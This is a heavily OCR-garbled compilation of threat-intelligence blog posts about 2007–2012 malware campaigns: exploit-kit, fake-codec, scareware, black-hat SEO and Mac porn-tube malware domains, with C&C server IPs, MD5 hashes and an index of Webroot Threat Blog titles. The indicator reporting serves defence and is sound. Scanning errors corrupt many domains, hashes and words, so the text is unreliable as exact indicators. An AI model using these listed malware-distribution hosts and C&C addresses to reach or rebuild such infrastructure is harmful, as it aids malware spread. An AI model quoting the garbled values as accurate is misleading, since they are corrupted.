S DOt.eom/2007/08/bank-of-india-servin 

g -malware.html 

26. httDs://web- 

beta.arch i ve.or a /web/2 010112 62020 ll/httD://ddanchev. blo g 
S DOt.eom/2007/12/have-vour-malware-in 
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-timelv-fashion.html 

27. httDs://web- 

beta.arch ive.or a /web/2 0080221124306/http://ddanchev. blo g 
s pot.eom/2008/01/dutch-embassv-in-mos 

cow-servin a -malware.html 

28. https://web- 

beta.archive.or a /web/20120304Q75303/http://ddanchev.blo a 

s pot.eom/2009/03/ethiopian-embassv-in 

-washin a ton-dc.html 

29. https://web- 

beta.arch ive.or a /web/2 013122 2200157/http://ddanchev. blo g 
s pot.com/2009/01/embassv-of-india-in- 




















































S Dain-servin a .html 


30. httDs://web- 

beta.archive.or a /web/20120303071653/httD://ddanchev.blo a 

s pot.eom/2009/03/azerbai i anian-embass 

ies-in-Dakistan-and.html 
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Historical OSINT - A Portfolio of Exploits Serving 
Domains (2017-05-29 09:04) 

With, the, rise, of, Web, malware, exploitation, kits, 
continuing, to, proliferate, cybercriminals, are, poised, to, 

continue, earning, fraudulent, revenue, in, the, process, of, 
monetizing, access, to, malware-infected, hosts, largely, 

relying, on, the, active,y utilization, of, client-side, exploits, 
further, spreaing, malicious, software, potentially, 
compromising, the, confidentiality, availability, and, 
integrity, of, the, targeted, host, to, a, multi-tude, of, 
malicious, software. 

What, used, to, be, an, ecosystem, dominated, by, 
proprietary, DIY (do-it-yourself) malware and exploits, 
generating, 

tools, is, today's, modern, cybercrime, ecosystem, dominated, 
by, Web, malware, exploitation, kits, successfully, 

empowering, novice, cybercriminals, with, the, necessary, 
tactics, techniques, and, procedures, for, the, purpose, of, 

launching, a, fraudulent, and, malicious, campaign, 
potentially, affecting, hundreds, of, thousands, of, users, 
globally. 












In, this, post, we'll, provide, actionable, intelligence, on, 
currently, active, IcePack, Web, malware, exploita¬ 
tion, kit, client-side, and, malware-exploits, serving, domains. 

Related IcePack Web Malware Exploitation Kit 
domains: 

hxxp://seateremok.com/xc/index.php 

hxxp://lskdfj lerjvm.com/ice-pack/index.php 

hxxp://formid leren.dk/domain/mere.asp 

hxxp://webs-money.info/ice-pack/index.php 

hxxp://seateremok.com/xc/index.php 

hxxp://g reeetthh.com/ice-packl/index.php 

hxxp://58.65.235.153/ pozitive/ice/index.php 

hxxp://iframe911.com/troy/us/sp/ice/index.php 

hxxp://themusicmp3.info/rmpanfr/index.php 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs (Iskd- 

fjlerjvm.com): 

MD5: 4c0958f2f9f5ff2e5ac47e92d4006452 
MD5: d955372c7ef939502c43a71ffla9f76e 
MD5: 118e24ea884d375dc9f63c986al5e5df 


MD5:e825a7e975a9817441da9bal054a3e6f 



MD5: 71460d4alc7cl8ec672fed56d764ebe6 


Once, executed, a, sample, malware (MD5: 
d955372c7ef939502c43a71ffla9f76e), phones, back, 
to, the, fol¬ 
lowing, malicious, C &C, server, IPs: 

hxxp://riddenstorm.net - 208.100.26.234 

hxxp://lordofthepings.ru - 109.70.26.37 

hxxp://tableshown.net - 208.100.26.234 

hxxp://leadshown.net 

hxxp://tablefood.ru 

hxxp://tablefood.net - 180.210.34.47 

hxxp://leadfood.net 

hxxp://tablemeet.net 

hxxp://lead meet, net 

hxxp://poi ntneck.net 

hxxp://poi ntshown.net 

hxxp://callshown.net - 212.61.180.100 

hxxp://callneck.ru 

hxxp://callneck.net 
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hxxp://ri ngshown.ru 



hxxp://ri ngshown.net 
hxxp://noneshown.net 

We'll, continue, monitoring, the, campaigns, and, post, 
updates, as, soon, as, new, developments, take, place. 
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Historical OSINT - A Portfolio of Fake/Rogue Video 
Codecs (2017-05-29 09:27) 

Shall we expose a huge domains portfolio of fake/rogue video 
codecs dropping the same Zlob variant on each and 

every of the domains, thereby acting as a great example of 
what malicious economies of scale means? 

Currently active Zlob malware variants promoting 
sites: 

hxxp://pornqaz.com 
hxxp://uinsex.com 
hxxp://qazsex.com 
hxxp://sexwh ite.net 
hxxp://l ightporn.net 
hxxp://xeroporn.com 
hxxp://brakeporn.net 
hxxp://sexclean.net 
hxxp://delfi porn, net 



hxxp://pornfire.net 

hxxp://redcodec.net 

hxxp://democodec.com 

hxxp://delficodec.com 

hxxp://turbocodec.net 

hxxp://gamecodec.com 

hxxp://blackcodec.net 

hxxp://xerocodec.com 

hxxp://ixcodec.net 

hxxp://codecdemo.com 

hxxp://ixcodec.com 

hxxp://citycodec.com 

hxxp://codecthe.com 

hxxp://codecn itro.com 

hxxp://codecbest.com 

hxxp://codecspace.com 

hxxp://popcodec.net 

hxxp://u incodec.com 

hxxp://xhcodec.com 

hxxp://stormcodec.net 



hxxp://codecmega.com 

hxxp://wh itecodec.com 

hxxp://jetcodec.com 

hxxp://endcodec.com 

hxxp://abccodec.com 

hxxp://codecred.net 

hxxp://cleancodec.com 

hxxp://herocodec.com 

hxxp://n icecodec.com 

Related MD5s, known, to, have, participated, in, the, 
campaign: 

MD5: 30965fdbd893990dd24abda2285d9edc 

Why are the malicious parties so KISS oriented at the end of 
every campaign, compared to the complexity 

and tactical warfare tricking automated malware harvesting 
approaches within the beginning of the campaign? 
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Because they're not even considering the possibility of 
proactively detecting the end of many other malware 
campaigns to come, which will inevitable be ending up to 
these domains. 
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Historical OSINT - A Diversified Portfolio of Fake 
Security Software (2017-05-29 09:38) 

Cybercriminals, continue, actively, launching, malicious, and, 
fraudulent, campaigns, further, spreading, malicious, 

software, potentially, exposing, the, confidentiality, 
availability, and, integrity, of, the, targeted, host, to, a, multi¬ 
tude, of, malicious, software. 

In, this, post, we'll, profile, a, currently, active, portfolio, of, 
fake, security, software, and, discuss, in-depth, 

the, tactics, techniques, and, procedures, of, the, 
cybercriminals, behind, it. 

Known, to, have, responded, to, the, same, 
malicious, C &C, server, IPs (91.212.226.203; 
94.228.209.195), 

are, also, the, following, malicious, domains: 

hxxp://thebest-anti virus00.com 
hxxp://vi russcannerproO.com 
hxxp://l ightandfastscanner01.com 
hxxp://thebest-anti virus01.com 
hxxp://thebestanti virus01.com 
hxxp://remove-spy ware-11.com 
hxxp://remove-vi rus-ll.com 
hxxp://thebest-anti virusll.com 



hxxp://a ntispyware-modulel.com 
hxxp://a ntispywaremodulel.com 
hxxp://a ntivirus-tooisrl.com 
hxxp://thebest-anti virusl.com 
hxxp://thebest-anti virusxl.com 
hxxp://thebestanti virus02.com 
hxxp://remove-spyware-12.com 
hxxp://remove-vi rus-12.com 
hxxp://deiete-ai i-virus-22.com 
hxxp://i ightandfastscanner22.com 
hxxp://prosecureprotection2.com 
hxxp://vi russcannerpro2.com 
hxxp://a ntivirus-tooisr2.com 
hxxp://thebest-anti virusx2.com 
hxxp://thebestanti virus03.com 
hxxp://remove-spyware-13.com 
hxxp://remove-vi rus-13.com 
hxxp://a ntispyware-moduie3.com 
hxxp://a ntispywaremoduie3.com 
hxxp://vi russcannerpro3.com 



hxxp://wi ndowsantivirusserver3.com 
hxxp://thebest-anti virusx3.com 
hxxp://thebestanti virus04.com 
hxxp://remove-spy ware-14.com 
hxxp://remove-vi rus-14.com 
hxxp://a ntispyware-scann4.com 
hxxp://a ntivirus-tooisr4.com 
hxxp://thebest-antivi rusx4.com 
hxxp://thebestanti virus05.com 
hxxp://remove-ai i-spyware-55.com 
hxxp://deiete-ai i-virus-55.com 
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hxxp://thebest-anti virusx5.com 
hxxp://remove-spy ware-16.com 
hxxp://i ightandfastscanner66.com 
hxxp://a ntispywaremoduie6.com 
hxxp://a ntispyware-moduie7.com 
hxxp://a ntispywaremoduie7.com 
hxxp://a ntivirus-tooisr7.com 
hxxp://a ntispyware-scann8.com 



hxxp://pro-secure-protection8.com 
hxxp://wi ndowsantivirusserver8.com 
hxxp://a ntispyware-moduie9.com 
hxxp://a ntispywaremoduie9.com 
hxxp://a ntispyware-scann9.com 
hxxp://vi russcannerpro9.com 
hxxp://a ntivirus-tooisr9.com 
hxxp://thebest-anti virus9.com 
hxxp://a ntivirusprolscan.com 
hxxp://a ntiviruspro2scan.com 
hxxp://a ntiviruspro7scan.com 
hxxp://a ntiviruspro8scan.com 
hxxp://a ntiviruspro9scan.com 
hxxp://a ntispyware6sacnner.com 
hxxp://a ntivirusvltoois.com 
hxxp://a ntispywarelOwindows.com 
hxxp://a ntispyware20windows.com 
hxxp://a ntivirus-tooisvv.com 
hxxp://remove-spy ware-11.com 
hxxp://remove-vi rus-ll.com 



hxxp://remove-spyware-12.com 
hxxp://remove-vi rus-12.com 
hxxp://delete-al l-virus-22.com 
hxxp://prosecureprotection2.com 
hxxp://remove-spyware-13.com 
hxxp://remove-vi rus-13.com 
hxxp://wi nclowsantivirusserver3.com 
hxxp://remove-spy ware-14.com 
hxxp://remove-vi rus-14.com 
hxxp://remove-ai i-spyware-55.com 
hxxp://cieiete-ai i-virus-55.com 
hxxp://remove-spy ware-16.com 
hxxp://pro-secure-protection8.com 
hxxp://wi nciowsantivirusserver8.com 
hxxp://a ntivirus-tooisr9.com 
hxxp://a ntivirusvltoois.com 
hxxp://a ntispywarelOwinciows.com 
hxxp://a ntispyware20winciows.com 
hxxp://a ntivirus-tooisvv.com 



Known, to, have, responded, to, the, same, 
malicious, C &C, server, IPs (94.228.209.195), are, 
also, the, fol¬ 
lowing, malicious, domains: 
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hxxp://run-anti virusscanO.com 
hxxp://ru nantivirusscanO.com 
hxxp ://remove-spy ware-11 .com 
hxxp://remove-vi rus-ll.com 
hxxp ://run-vi rus-scannerl.com 
hxxp://remove-spyware-12.com 
hxxp ://remove-vi rus-12.com 
hxxp ://cieiete-ai i-virus-22.com 
hxxp://remove-spyware-13.com 
hxxp ://remove-vi rus-13.com 
hxxp ://ru nantivirusscan3.com 
hxxp ://ru n-virusscanner3.com 
hxxp ://remove-spy ware-14.com 
hxxp ://remove-vi rus-14.com 
hxxp ://ru n-virusscanner4.com 
hxxp ://remove-vi rus-15.com 



hxxp://remove-al l-spyware-55.com 
hxxp://delete-al l-virus-55.com 
hxxp://remove-spy ware-16.com 
hxxp://ru n-virus-scanner6.com 
hxxp://ru n-virusscanner6.com 
hxxp://ru nantivirusscan8.com 
hxxp://ru n-virus-scanner8.com 
hxxp://wi nciowsantivirusserver8.com 
hxxp://ru n-virus-scanner9.com 
hxxp://ru n-virusscanner9.com 

Related, fraudulent, and, malicious, domains, known, 
to, have, participated, in, the, campaign: 

hxxp://run-anti virusscanO.com 

hxxp://run-anti virusscanl.com 

hxxp://ru n-antivirusscan3.com 

hxxp://ru n-antivirusscan6.com 

hxxp://ru n-antivirusscan8.com 

hxxp://ru nantivirusscanO.com 

hxxp://ru nantivirusscan3.com 

hxxp://ru nantivirusscan4.com 



hxxp://ru nantivirusscan9.com 
hxxp://secu repro-antivirusl.com 

Known, to, have, responded, to, the, same, 
malicious, C &C, server, IPs (91.212.226.203), are, 
also, the, fol¬ 
lowing, malicious, domains: 

hxxp://a nti-virus-systemO.com 
hxxp://run-anti virusscanO.com 
hxxp://ru nantivirusscanO.com 
hxxp://perform-anti virus-scan-1.com 
hxxp://remove-spy ware-11.com 
hxxp://remove-vi rus-ll.com 
hxxp://a ntivirus-systeml.com 
hxxp://performspy warescanl.com 
hxxp://run-vi rus-scannerl.com 
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hxxp://remove-spyware-12.com 
hxxp://remove-vi rus-12.com 
hxxp://cieiete-ai i-virus-22.com 
hxxp://a ntivirus-scanner-3.com 
hxxp://remove-spy ware-13.com 



hxxp://remove-vi rus-13.com 
hxxp://ru nantivirusscan3.com 
hxxp://ru n-virusscanner3.com 
hxxp://remove-spy ware-14.com 
hxxp://remove-vi rus-14.com 
hxxp://g ioriousantivirus2014.com 
hxxp://ru n-virusscanner4.com 
hxxp://smart-pcscan ner05.com 
hxxp://remove-vi rus-15.com 
hxxp://remove-ai i-spyware-55.com 
hxxp://cieiete-ai i-virus-55.com 
hxxp://perform-vi rus-scan5.com 
hxxp://perform-anti virus-scan-6.com 
hxxp://a ntivirus-scanner-6.com 
hxxp://remove-spy ware-16.com 
hxxp://ru n-virus-scanner6.com 
hxxp://ru n-virusscanner6.com 
hxxp://a ntivirus-scan-server6.com 
hxxp://perform-anti virus-scan-7.com 
hxxp://perform-anti virus-test-7.com 



hxxp://a ntivirus-win-system7.com 
hxxp://a ntivirus-for-pc-8.com 
hxxp://perform-anti virus-scan-8.com 
hxxp://perform-anti virus-test-8.com 
hxxp://ru n-antivirusscan8.com 
hxxp://ru nantivirusscan8.com 
hxxp://ru n-virus-scanner8.com 
hxxp://wi nciowsantivirusserver8.com 
hxxp://perform-anti virus-test-9.com 
hxxp://perform-vi rus-scan9.com 
hxxp://a ntispywareinfo9.com 
hxxp://ru n-virus-scanner9.com 
hxxp://ru n-virusscanner9.com 
hxxp://a ntispyware06scan.com 
hxxp://a ntispywareinfo9.com 
hxxp://antivi rus-for-pc-2.com 
hxxp://antivi rus-for-pc-4.com 
hxxp://a ntivirus-for-pc-6.com 
hxxp://a ntivirus-for-pc-8.com 
hxxp://a ntiviruspro8scan.com 



hxxp://extra-anti virus-scanl.com 
hxxp://extra-secu rity-scanbl.com 
hxxp://run-anti virusscanO.com 
hxxp://run-anti virusscanl.com 
hxxp://ru n-antivirusscan3.com 
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hxxp://ru n-antivirusscan6.com 

hxxp://ru n-antivirusscan8.com 

hxxp://ru nantivirusscanO.com 

hxxp://ru nantivirusscan3.com 

hxxp://ru nantivirusscan4.com 

hxxp://ru nantivirusscan9.com 

hxxp://secu repro-antivirusl.com 

hxxp://su per-scanner-2004.com 

hxxp://top-ratean rivirusO.com 

hxxp://topa ntimaiware-scanner7.com 

We'ii, continue, monitoring, the, campaign, and, post, 
updates, as, soon, as, new, deveiopments, take, piace. 
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Historical OSINT - Google Sponsored Scareware 
Spotted in the Wild (2017-05-29 15:48) 



Cybercriminals continue actively spreading malicious 
software while looking for alternative ways to acquire and 


monetize legitimate traffic successfully earning fraudulent 
revenue in the process of spreading malicious software. 

We've recently came across to a Google Sponsored scareware 
campaign successfully enticing users into installing 

fake security software on their hosts further earning 
fraudulent revenue in the process of monetizing access to 

malware-infected hosts largely relying on the utilization of an 
affiliate-network based type of revenue sharing scheme. 

In this post we'll profile the campaign, provide actionable 
intelligence, on the infrastructure, behind it and dis¬ 
cuss in-depth, the tactics techniques and procedures of the 
cybercriminals behind it. 

hxxp://www.google. com/acll<?sa=l &ai=Czd4NEnlLS- 
p WlrSlA-jBmlw09pfjnQHOjKCvEI2B8woQAiglUPjA4pz8 

_ wFgyZajiqSkxBGgAabhse4DyAEBqgQh T9 

CjnzCh YHf5zQB4c8FB-fW9 WUzgcUTQ4c7ciD4GyxsO 

&num=5 

&sig=AGiWqty0Uq3Kr6UlSbl0olrq6C22JfNR 

_w 

&q=http://www.adwarepronow. com 

hxxp://www.google. com/acll<?sa=L &al=COLI<5EnlLS- 
p WIrSlA-jBmIwOOYGZm wGz9aqwDblw8bcBEAUoCFCnyNGE _ 



_ 8BYMm Wo4qkpM0RyAEBqg0ZT9 

CTvAGhbX 

_5PQN 

_ 7QaAII<7HT3dQfrqLJQ 

&num=8amp;sig=AGiWqtyHmo4mgVkszSWtDUcT4dMRUAQn 

Xg 

&q=http://www.antimalware-2010. com 

Known malicious domains known to have participated 
in the campaign: 

hxxp://www.ad warepronow.com/? 

gclid=CJ6d8LSGnZ8CFRMqagodmR _KaA - 209.216.193.112 

Known malicious domains known to have participated 
in the campaign: 

hxxp://www.antimalware-2010.com/ - 209.216.193.119 

Sample detection rate for a sample malware: 

MD5: 8328da91c8eba6668b3e72d547157ac7 

Sample detection rate for a sample malware: 

MD5: b74412ea403241c9c60482fdl3540505 

Once, executed, a, sample, malware, phones, back, 
to, the, following, malicious, C &C, server, IPs: 

hxxp ://7 2.167.164.199/definitions/configu ration.txt 



hxxp://72.167.164.199/latestversion/AntiMalwarePro 

_appversion.txt 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - A Diversified Portfolio of 
Pharmacautical Scams Spotted in the Wild (2017-05- 
29 16:04) Cybercriminals continue actively speeding 
fraudulent and malicious campaigns potentially targeting the 
confidentiality availability and integrity of the targeted host 
to a multi-tude of malicious software further earning 
fraudulent 

revenue in the process of monetizing access to malware- 
infected hosts further spreading malicious and fraudulent 

campaigns potentially affecting hundreds of thousands of 
users globally. 

We've recently came across to a currently active diversified 
portfolio of pharmaceutical scams with the cyber¬ 
criminals behind it successfully earning fraudulent revenue 
in the process of monetizing access to malware-infected 

hosts including the active utilization of an affiliate-network 
based type of revenue sharing scheme. 

In this post we'll profile the campaign, provide actionable 
intelligence, on the infrastructure behind it, and dis¬ 
cuss in depth, the tactics techniques and procedures of the 
cybercriminals behind it. 
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We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - Massive Black Hat SEO Campaign 
Spotted in the Wild (2017-05-29 19:28) 

Cybercriminals continue actively launching fraudulent and 
malicious blackhat SEO campaigns further acquiring 

legitimate traffic for the purpose of converting it into 
malware-infected hosts further spreading malicious software 

potentially compromising the confidentiality availability and 
integrity of the targeted host to a multi-tude of malicious 

software. 

We've recently intercepted a currently active malicious 
blackhat SEO campaign serving scareware to socially 

engineered users with the cybercriminals behind it earning 
fraudulent revenue largely relying on the utilization of an 

affiliate-network based revenue-sharing scheme. 

In this post we'll profile the campaign, provide actionable 
intelligence on the infrastructure behind it, and dis¬ 
cuss in-depth the tactics techniques and procedures of the 
cybercriminals behind it. 

Known malicious domains known to have participated 
in the campaign: 

hxxp://doremisan7.net?uid = 213 &pid = 3 &ttl = 319455a3f86 
- 67.215.238.189 



Known malicious redirector known to have 
participated in the campaign: 

hxxp://marketcoms.cn/?pid = 123 &sid = 8ec7ca &uid = 213 
&isRedirected = l - 91.205.40.5 - Email: 

JeremyL- 

Rademacher(g)| ive.com 

Related malicious domains known to have been 
parked within the same malicious IP (91.205.40.5): 

hxxp://browsersafeon.com 

hxxp://on I ine-income2.cn 

hxxp://applestore2.cn 

hxxp://med ia-news2.cn 

hxxp://cl i nt-eastwood .cn 

hxxp://stone-sour.cn 

hxxp://marketcoms.cn 

hxxp://fash ion-news.cn 

Known malicious domains known to have participated 
in the campaign: 

hxxp://guard-syszone.net/? 

p=WKmimHVmaWyHjsblo22EeXZeOKCfZlbVoKDb2YmHWJjOx 

aCbk 

XI 


%2Bal6orKWeYJWfZW 



VilWWenGOIo6THodjXoGJdpqmikpVuaGVvZGlkbV %2FEkKE 
%3D- 206.53.61.73 

hxxp://yourspywarescanl5.com/scanl/?pid = 123 
&engine=pXT3wjTuNjYzLjE3Ny4xNTMmdGltZT0xMjUxMYkNP 
AFO - 

85.12.24.12 

Sample detection rate for sample malware: 

MD5: 3d448b584d52c6a6a45ff369d839eb06 

MD5: 54f671bb9283bf4dfdf3c891fd9cd700 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - Mac OS X PornTube Malware 
Serving Domains (2017-05-29 20:05) 

Cybercriminals continue to actively launch maliciuos and 
fraudulent malware-serving campaigns further spreading 

malicious software potentially compromising the 
confidentiality availability and integrity of hte targeted host 
to 

a multit-tude of malicious software further spreading 
malicious software while earning fraudulent revenue in the 

process of monetizing access to malware-infected hosts. 

We've recently intercepted a currently active portfolio of 
rogue/fake/ PornTube malicious and fraudulent do- 



mains, with the cybercriminals behind the campaign earning 
fraudulent revenue largely relying on the utilization of 

an affiliate-network based revenue-sharing scheme. 

In this post we'll profile the campaign, provide actionable 
intelligence on the infrastructure behind it, and dis¬ 
cuss in-depth the tactics techniques and procedures of the 
cybercriminals behind it. 

Known to have been parked within the same 
maiicious iP (93.190.140.56) are aiso the foiiowing 
maiicious 

domains: 

hxxp://playfucktube.com 

hxxp://mac-videos.com 

hxxp://xhottube.net 

hxxp://playfucktu be.comtubeporn08.com 

hxxp://porn-tube09.com 

hxxp://tubeporn09.com 

hxxp://xxxporn-tu be.com 

hxxp://playfucktube.com 

hxxp ://a 11 soft-free.com 

hxxp://a 11-softfree.com 

hxxp ://l softfree.com 



hxxp://porntu benew.com 
hxxp://porn megatube, net 
hxxp://xhottube.net 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Cyber 

Conspiracy 
Who OtaHiS 
Them All 

By Dancho Danchev 

The adventurous and fancyful life of a Bulgarian hacker in the 90's caught 
between the mussings of the security industry and the Intelligence 
Community pursuing his own personal goals leading to a blissful career as a 
renewed secutity expert for a international foundation 


Book Proposal - Seeking Sponsorship - Publisher 
Contact (2017-11-15 14:23) 

Dear blog readers, as I'm currently busy writing a book, I' 
currently seeking a publisher contact, with the book 

proposal available on request. 

Approach me at ddanchev(g)cryptogroup.net 
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Historical OSINT - Summarizing 2 Years of Webroot's 
Threat Biog Posts Research (2018-07-28 21:00) 

It's been several years since I last posted a quality update at 
the industry's leading threat-intelligence gathering 

[l]Webroot's Threat Blog following a successful career as 
lead security blogger and threat-intelligence analyst 

throughout 2012-2014. 

In this post I'll summarize two years worth of Webroot's 
Threat Blog research with the idea to provide readers 


with the necessary data information and knowledge to stay 
ahead of current and emerging threats. 

01. January - 2012 

• [2]Cybercriminals generate malicious Java applets using 
DIY tools 

• [3]A peek inside the uBot malware hot 

• [4]Researchers intercept a client-side exploits serving 
malware campaign 

• [5]How phishers launch phishing attacks 

• [6]A peek inside the Umbra malware loader 

• [7]How malware authors evade antivirus detection 

• [SJInside AnonJDB - a Java based malware distribution 
platforms for drive-by downloads 

• [9JZappos.com hacked, 24 million users affected 

• [lOJInside a clickjacking/likejacking scam distribution 
platform for Facebook 

• [IIJA peek inside the Cythosia v2 DDoS Bot 

• [12JA peek inside the PickPocket Botnet 

• [13]Mass SQL injection attack affects over 200,000 URLs 

• [14]Email hacking for hire going mainstream 

• [ISJMillions of harvested emails offered for sale 
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02. February - 2012 

• [16]Research: Google's reCAPTCHA underfire 

• [17]Spamvertised 'You have 1 lost message on Facebook' 
campaign leads to pharmaceutical scams 

• [18]A peek inside the Smoke Malware Loader 

• [19]Researchers spot Citadel, a ZeuS crimeware variant 

• [20]Researchers intercept two client-side exploits serving 
malware campaigns 

• [21]Pharmaceutical scammers launch their own Web 
contest 

• [22]The United Nations hacked, Team Poison claims 
responsibility 

• [23]Report: Internet Explorer 9 leads in socially-engineered 
malware protection 

• [24]Twitter adds HTTPS support by default 

• [25]Spamvertised "Hallmark ecard" campaign leads to 
malware 

• [26]Report: 3,325 % increase in malware targeting the 
Android OS 

• [27]Why relying on antivirus signatures is simply not 
enough anymore 

• [28]Researchers intercept malvertising campaign using 
Yahoo's ad network 

• [29]A peek inside the Ann Malware Loader 



• [30]Spamvertised Termination of your CPA license' 
campaign serving client-side exploits 

• [31]How cybercriminals monetize malware-infected hosts 

• [32]A peek inside the Elite Malware Loader 

• [33]BlackHole exploit kits gets updated with new features 

03. March - 2012 

• [34]New service converts malware-infected hosts into 
anonymization proxies 

• [35]Spamvertised Temporary Limit Access To Your Account' 
emails lead to Citi phishing emails 

• [36]A peek inside the Darkness (Optima) DDoS Bot 

• [37]Research: proper screening could have prevented 67 % 
of abusive domain registrations 

• [38]Spamvertised 'Your accountant license can be revoked' 
emails lead to client-side exploits and malware 

• [39]Spamvertised 'Google Pharmacy' themed emails lead 
to pharmaceutical scams 

• [40]Research: U.S accounts for 72 % of fraudulent 
pharmaceutical orders 

• [41]Millions of harvested U.S government and U.S military 
email addresses offered for sale 

• [42]Trojan Downloaders actively utilizing Dropbox for 
malware distribution 
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• [43]Spamvertised 'Your tax return appeal is declined' 
emails serving client-side exploits and malware 

• [44]Malicious USPS-themed emails circulating in the wild 

• [45]Spamvertised Linkedin notifications serving client-side 
exploits and malware 

• [46]Tens of thousands of web sites affected in ongoing 
mass SQL injection attack 

• [47]Spamvertised Verizon-themed 'Your Bill Is Now 
Available' emails lead to ZeuS crimeware 

• [48]Spamvertised 'Scan from a Hewlett-Packard ScanJet' 
emails lead to client-side exploits and malware 

04. April - 2012 

• [49]Email hacking for hire going mainstream - part two 

• [50]Spamvertised 'US Airways' themed emails serving 
client-side exploits and malware 

• [51]New underground service offers access to hundreds of 
hacked PCs 

• [52]New DIY email harvester released in the wild 

05. May - 2012 

• [53]Managed SMS spamming services going mainstream 

• [54]A peek inside a boutique cybercrime-friendly E-shop 

• [55]Cybercriminals release 'Sweet Orange' - new web 
malware exploitation kit 



• [56]Spamvertised 'Pizzeria Order Details' themed 
campaign serving client-side exploits and malware 

• [57]Poison Ivy trojan spreading across Skype 

• [58]A peek inside a managed spam service 

• [59]Ongoing 'Linkedin Invitation' themed campaign 
serving client-side exploits and malware 

• [60]Spamvertised bogus online casino themed emails 
serving adware 

• [61]Spamvertised 'YouTube Video Approved' and 'Twitter 
Support" themed emails lead to pharmaceutical 

scams 

• [62]A peek inside a boutique cybercrime-friendly E-shop - 
part two 

• [63]Spamvertised CareerBuilder themed emails serving 
client-side exploits and malware 

• [64]Pop-ups at popular torrent trackers serving 
W32/Casonline adware 

• [65]'Windstream bill' themed emails serving client-side 
exploits and malware 

06. June - 2012 

• [66]Cybercriminals infiltrate the music industry by offering 
full newly released albums for just $1 
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• [67]A peek inside a boutique cybercrime-friendly E-shop - 
part three 

• [68]DDoS for hire services offering to 'take down your 
competitor's web sites' going mainstream 

• [69]Skype propagating Trojan targets Syrian activists 

• [70]Spamvertised 'UPS Delivery Notification' emails 
serving client-side exploits and malware 

• [71]Spamvertised 'DHL Package delivery report' emails 
serving malware 

• [72]Spamvertised 'YourAmazon.com order confirmation' 
emails serving client-side exploits and malware 

• [73]Cybercriminals populate Scribd with bogus adult 
content, spread malware using Comodo Backup 

• [74]Spamvertised 'Your Paypal Ebay.com payment' emails 
serving client-side exploits and malware 

• [75]'Create a Cartoon of You" ads serving MyWebSearch 
toolbar 

• [76]Spamvertised 'Your UPS delivery tracking' emails 
serving client-side exploits and malware 

• [77]Spamvertised 'Confirm PayPal account" notifications 
lead to phishing sites 

• [78]Spamvertised 'DHL Express Parcel Tracking 
Notification' emails serving malware 

• [79]Spamvertised bogus online casino themed emails 
serving W32/Casonline 



07. July - 2012 


• [80]Cybercriminals launch managed SMS flooding services 

• [81]117,000 unique U.S visitors offered for malware 
conversion 

• [82]Phishing campaign targeting Gmail, Yahoo, AOL and 
Hotmail spotted in the wild 

• [83]What's the underground market's going rate for a 
thousand U.S based malware infected hosts? 

• [84]Spamvertised American Airlines themed emails lead to 
Black Hole exploit kit 

• [85]Online dating scam campaign currently circulating in 
the wild 

• [86]New Russian service sells access to compromised social 
networking accounts 

• [87]Cybercriminals impersonate UPS in client-side exploits 
and malware serving spam campaign 

• [88]Russian Ask.fm spamming tool spotted in the wild 

• [89]Spamvertised Intuit themed emails lead to Black Hole 
exploit kit 

• [90]Cybercriminals impersonate Booking.com, serve 
malware using bogus 'Hotel Reservation Confirmation' 

themed emails 

• [91]Spamvertised Craigslist themed emails lead to Black 
Hole exploit kit 



• [92]Cybercriminals impersonate law enforcement, 
spamvertise malware-serving 'Speeding Ticket' themed 

emails 

• [93]Spamvertised 'Download your LISPS Label' themed 
emails serve malware 
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• [94]Cybercriminals target Twitter, spread thousands of 
exploits and malware serving tweets 

• [95]Russian spammers release Skype spamming tool 

• [96]Spamvertised 'Your Ebay funds are cleared' themed 
emails lead to Black Hole exploit kit 

08. August - 2012 

• [97]Spamvertised AlCPA themed emails lead to Black Hole 
exploit kit 

• [98]Spamvertised 'PayPal has sent you a bank transfer' 
themed emails lead to Black Hole exploit kit 

• [99]Ongoing spam campaign impersonates Linkedin, 
serves exploits and malware 

• [100]Millions of spamvertised emails lead to 
W32/Casonline 

• [101]Cybercriminals impersonate AT &T's Billing Service, 
serve exploits and malware 

• [102]IRS themed spam campaign leads to Black Hole 
exploit kit 



• [103]Cybercriminals spamvertise bogus greeting cards, 
serve exploits and malware 

• [104]Spamvertised 'Federal Tax Payment Rejected' themed 
emails lead to Black Hole exploit kit 

• [105]Spamvertised 'Fwd: Scan from a Hewlett-Packard 
ScanJet' emails lead to Black Hole exploit kit 

• [106]Spamvertised 'Royal Mail Shipping Advisory' themed 
emails serve malware 

• [107]Cybercriminals impersonate Intuit Market, mass mail 
millions of exploits and malware serving emails 

• [lOSjCybercriminals spamvertise PayPay themed 
'Notification of payment received' emails, serve malware 

• [109]Cybercriminals impersonate UPS, serve malware 

09. September - 2012 

• [llOjSpamvertised 'Wire Transfer Confirmation'themed 
emails lead to Black Hole exploit kit 

• [llljlntuit themed 'QuickBooks Update: Urgent' emails 
lead to Black Hole exploit kit 

• [112]Cybercriminals resume spamvertising bogus 
greeeting cards, serve exploits and malware 

• [113]Cybercriminals abuse Skype's SMS sending feature, 
release DIY SMS flooders 

• [114]New Russian service sells access to thousands of 
automatically registered accounts 



• [115]Spamvertised 'Your Fedex invoice is ready to be paid 
now' themed emails lead to Black Hole Exploit kit 

• [116]New Russian DIY SMS flooder using ICQ's SMS sending 
feature spotted in the wild 

• [117]Spamvertised 'US Airways reservation confirmation' 
themed emails serve exploits and malware 

• [118]Cybercriminals impersonate FDIC, serve client-side 
exploits and malware 

• [119]Managed Ransomware-as-a-Service spotted in the 
wild 
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• [120]A peek inside a boutique cybercrime-friendly E-shop - 
part four 

• [121]New E-shop selling stolen credit cards data spotted in 
the wild 

• [122]From Russia with iPhone selling affiliate networks 

• [123]New Russian DIY DDoS bot spotted in the wild 

10. October - 2012 

• [124]New Russian DIY DDoS bot spotted in the wild 

• [125]Recently launched E-shop sells access to hundreds of 
hacked PayPal accounts 

• [126]New Russian service sells access to compromised 
Steam accounts 



• [127]'Vodafone Europe: Your Account Balance' themed 
emails serve malware 

• [128]Cybercriminals impersonate UPS, serve client-side 
exploits and malware 

• [129]'Your video may have illegal content' themed emails 
serve malware 

• [130]Cybercriminals spamvertise 'Amazon Shipping 
Confirmation' themed emails, serve client-side exploits and 

malware 
